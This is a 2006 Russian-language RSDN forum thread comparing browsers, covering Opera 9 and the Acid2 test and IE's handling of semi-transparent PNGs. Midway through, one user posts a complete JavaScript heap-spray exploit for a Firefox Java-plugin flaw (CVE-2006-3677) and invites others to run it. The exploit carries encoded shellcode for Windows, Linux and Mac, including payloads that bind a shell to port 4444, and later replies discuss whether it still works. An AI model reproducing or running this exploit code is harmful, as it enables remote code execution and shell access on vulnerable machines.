Re: И снова о браузерах...
От: Mamut Швеция http://dmitriid.com
Дата: 27.07.06 07:16
Оценка: 2 (2) +1
Здравствуйте, Sheridan, Вы писали:

S>Всетаки firefox рулит пока что.


Рулит Опера 9. Для затравки — Acid2 Browser Test.
... << RSDN@Home 1.2.0 alpha rev. 647>> ... <<(1,A10)Rheingold — Wotan! Gemahl!Erwache>> ...


dmitriid.comGitHubLinkedIn
Re[3]: И снова о браузерах...
От: Sinclair Россия https://github.com/evilguest/
Дата: 27.07.06 15:54
Оценка:
Здравствуйте, Sheridan, Вы писали:

S>Нет

S>Полупрозрачный 20х20 png в качестве фона.
Не, ну неподдержка полупрозрачных PNG в IE известна от зари времен. Зачем козе баян? Используй фильтр alpha + -moz-opacity.
1.1.4 stable rev. 510
Уйдемте отсюда, Румата! У вас слишком богатые погреба.
Re[4]: И снова о браузерах...
От: Sheridan Россия  
Дата: 28.07.06 03:51
Оценка:
Здравствуйте, Sinclair, Вы писали:

S>Здравствуйте, Sheridan, Вы писали:


S>>Нет

S>>Полупрозрачный 20х20 png в качестве фона.
S>Не, ну неподдержка полупрозрачных PNG в IE известна от зари времен. Зачем козе баян? Используй фильтр alpha + -moz-opacity.

Тоесть для ие альфу, для мозил — моз-опакалити? Извращение...
Какого формата полупрозрачные картинки поддерживается?

[RSDN@Home][1.2.0][alpha][653]
[Армейская дисциплина тяжела, но это тяжесть щита, а не ярма. [А. Ривароль]]
Matrix has you...
Re[2]: И снова о браузерах...
От: _rasta  
Дата: 28.07.06 06:34
Оценка: +1
Здравствуйте, Mamut, Вы писали:

M>Здравствуйте, Sheridan, Вы писали:


S>>Всетаки firefox рулит пока что.


M>Рулит Опера 9. Для затравки — Acid2 Browser Test.


хм...
Version information
Version
9.00
Build
8501
Platform
Win32
System
Windows XP
Java
Sun Java Runtime Environment version 1.4
и что я делаю не так, что у меня в области глаз рисуются красные полосы?

а вот конкверор все отлично отрисовал. он вообще дааааавно этот тест проходит...
Re: И снова о браузерах...
От: _rasta  
Дата: 28.07.06 06:43
Оценка:
Здравствуйте, Sheridan, Вы писали:

забавное сравнение. я так полагаю страницы проходят валидацию, да?

и код, естественно, тоже можно посмотреть?
Re[2]: И снова о браузерах...
От: Sheridan Россия  
Дата: 28.07.06 07:53
Оценка:
Здравствуйте, _rasta, Вы писали:

_>забавное сравнение. я так полагаю страницы проходят валидацию, да?

_>и код, естественно, тоже можно посмотреть?

Код дома, но выложу если надо, хотя все там просто. Если интересует прозрачность то вот как приблизительно я ее делаю...

[RSDN@Home][1.2.0][alpha][655]
[...не вы съели идею, а вас съела идея. [Ф. М. Достоевский]]
Matrix has you...
Re[3]: И снова о браузерах...
От: Mamut Швеция http://dmitriid.com
Дата: 28.07.06 08:35
Оценка:
_>хм...
_>Version information
_>Version
_> 9.00
_>Build
_> 8501
_>Platform
_> Win32
_>System
_> Windows XP
_>Java
_> Sun Java Runtime Environment version 1.4
_>и что я делаю не так, что у меня в области глаз рисуются красные полосы?

Не знаю У меня такая же конфигурация и все на ура

_>а вот конкверор все отлично отрисовал. он вообще дааааавно этот тест проходит...


Гады Когжда это в FF появится? А IE7 так и не проходит
... << RSDN@Home 1.2.0 alpha rev. 647>> ... <<Ennio Morricone — Speakeasy>> ...


dmitriid.comGitHubLinkedIn
Re[5]: И снова о браузерах...
От: Sinclair Россия https://github.com/evilguest/
Дата: 28.07.06 16:57
Оценка:
Здравствуйте, Sheridan, Вы писали:
S>Тоесть для ие альфу, для мозил — моз-опакалити? Извращение...
S>Какого формата полупрозрачные картинки поддерживается?
В смысле? Полупрозрачность вообще есть только в PNG. Поддержка полупрозрачности в PNG есть начиная с IE 7.0. "Непрямая" поддержка прозрачности в PNG есть начиная с IE 5.0.
1.1.4 stable rev. 510
Уйдемте отсюда, Румата! У вас слишком богатые погреба.
Re[2]: И снова о браузерах...
От: Pyromancer  
Дата: 28.07.06 19:12
Оценка:
Здравствуйте, Mamut, Вы писали:

M>Здравствуйте, Sheridan, Вы писали:


S>>Всетаки firefox рулит пока что.


M>Рулит Опера 9. Для затравки — Acid2 Browser Test.


Оперу 9 специально подогнали напильником, чтоб именно этот тест пройти.
Попробуйте сделать в опере следующее:

1. Set browser javascript to "2" Browser Javascript
2. On menu click Help >> Check for Updates
3. Make sure User Javascript is on.
4. Go here http://webstandards.org/files/acid2/test.html and click take the test.
5. Wait 2 minutes, meanwhile watch the face.
6. Wait a further 55 seconds and watch the eyes

Re[3]: И снова о браузерах...
От: Mamut Швеция http://dmitriid.com
Дата: 29.07.06 08:01
Оценка:
P>Оперу 9 специально подогнали напильником, чтоб именно этот тест пройти.
P>Попробуйте сделать в опере следующее:

P>1. Set browser javascript to "2" Browser Javascript

P>2. On menu click Help >> Check for Updates
P>3. Make sure User Javascript is on.
P>4. Go here http://webstandards.org/files/acid2/test.html and click take the test.
P>5. Wait 2 minutes, meanwhile watch the face.
P>6. Wait a further 55 seconds and watch the eyes

P>


Пришлось читать описание того, что происходит, у меня ничего не произошло Видать, из-за того, что папка user javascript у меня в другое место указана.
... << RSDN@Home 1.2.0 alpha rev. 647>> ... <<Ночные снайперы — Грязные танцы>> ...


dmitriid.comGitHubLinkedIn
Re: И снова о браузерах...
От: neiroman Украина  
Дата: 08.08.06 04:00
Оценка:
Натравите FF на такой файл и немного подождите :
<html><body><script>

// MoBB Demonstration
function Demo() {

    // Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
    // https://bugzilla.mozilla.org/show_bug.cgi?id=342267
    // CVE-2006-3677

    // The Java plugin is required for this to work

    // win32 = calc.exe
    var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
    var fill_win32 = unescape('%u0800');
    var addr_win32 = 0x08000800;
    
    // linux = touch /tmp/METASPLOIT (unreliable)
    var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
    var fill_linux = unescape('%ua8a8');
    var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

    // mac os x ppc = bind a shell to 4444
    var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
    var fill_macppc = unescape('%u0c0c');
    var addr_macppc = 0x0c000000;
    
    // mac os x intel = bind a shell to 4444
    // Thanks to nemo[at]felinemenace.org for shellcode
    // Thanks to Todd Manning for the target information and testing
    var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
    var fill_macx86 = unescape('%u1c1c');
    var addr_macx86 = 0x1c000000;        


    // Start the browser detection
    var shellcode;
    var addr;
    var fill;
    var ua = '' + navigator.userAgent;

    if (ua.indexOf('Linux') != -1) {
        alert('Trying to create /tmp/METASPLOIT');
        shellcode = shellcode_linux;
        addr = addr_linux;
        fill = fill_linux;
    }
    
    if (ua.indexOf('Windows') != -1) {
        alert('Trying to launch Calculator');    
        shellcode = shellcode_win32;
        addr = addr_win32;
        fill = fill_win32;
    }    

    if (ua.indexOf('PPC Mac OS') != -1) {
        alert('Trying to bind a shell to 4444');
        shellcode = shellcode_macppc;
        addr = addr_macppc;
        fill = fill_macppc;
    }    
    
    if (ua.indexOf('Intel Mac OS') != -1) {
        alert('Trying to bind a shell to 4444');
        shellcode = shellcode_macx86;
        addr = addr_macx86;
        fill = fill_macx86;
    }
            
    if (! shellcode) {
        alert('OS not supported, only attempting a crash!');
        shellcode = unescape('%ucccc');
        fill = unescape('%ucccc');
        addr = 0x02020202;
    }
        
    var b = fill;
    while (b.length <= 0x400000) b+=b;

    var c = new Array();
    for (var i =0; i<36; i++) {
        c[i] =
            b.substring(0,  0x100000 - shellcode.length) + shellcode +
            b.substring(0,  0x100000 - shellcode.length) + shellcode +
            b.substring(0,  0x100000 - shellcode.length) + shellcode +
            b.substring(0,  0x100000 - shellcode.length) + shellcode;
    }
            
    
    if (window.navigator.javaEnabled) {
        window.navigator = (addr / 2);
        try {
            java.lang.reflect.Runtime.newInstance(
                java.lang.Class.forName("java.lang.Runtime"), 0
            );
            alert('Patched!');
        }catch(e){
            alert('No Java plugin installed!');
        }
    }
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>
icq# 348-436-436 Играет silent
Слова, пустые слова, подумал Стормгрен. Слова, за которые прежде люди дрались и умирали, но никогда больше не станут за них ни умирать, ни драться. И от этого мир станет лучше.
Re[2]: И снова о браузерах...
От: Cyberax Марс  
Дата: 08.08.06 05:52
Оценка:
neiroman wrote:
> Натравите FF на такой файл и немного подождите :

No Java plugin installed


Java-plugin есть, просто FF сам автоматически запатчился за день до
публичного выхода эксплоита.
Posted via RSDN NNTP Server 2.0
Sapienti sat!
Re[3]: И снова о браузерах...
От: neiroman Украина  
Дата: 08.08.06 06:24
Оценка:
C>Java-plugin есть, просто FF сам автоматически запатчился за день до
C>публичного выхода эксплоита.
У меня срабатывает на ура — запускатся калькулятор.
icq# 348-436-436 Играет silent
Слова, пустые слова, подумал Стормгрен. Слова, за которые прежде люди дрались и умирали, но никогда больше не станут за них ни умирать, ни драться. И от этого мир станет лучше.
Re[4]: И снова о браузерах...
От: Cyberax Марс  
Дата: 08.08.06 06:59
Оценка:
neiroman wrote:
> C>Java-plugin есть, просто FF сам автоматически запатчился за день до
> C>публичного выхода эксплоита.
> У меня срабатывает на ура — запускатся калькулятор.
Нажми на красную стрелочку в правом верхнем углу
Posted via RSDN NNTP Server 2.0
Sapienti sat!
Подождите ...
Wait...
Пока на собственное сообщение не было ответов, его можно удалить.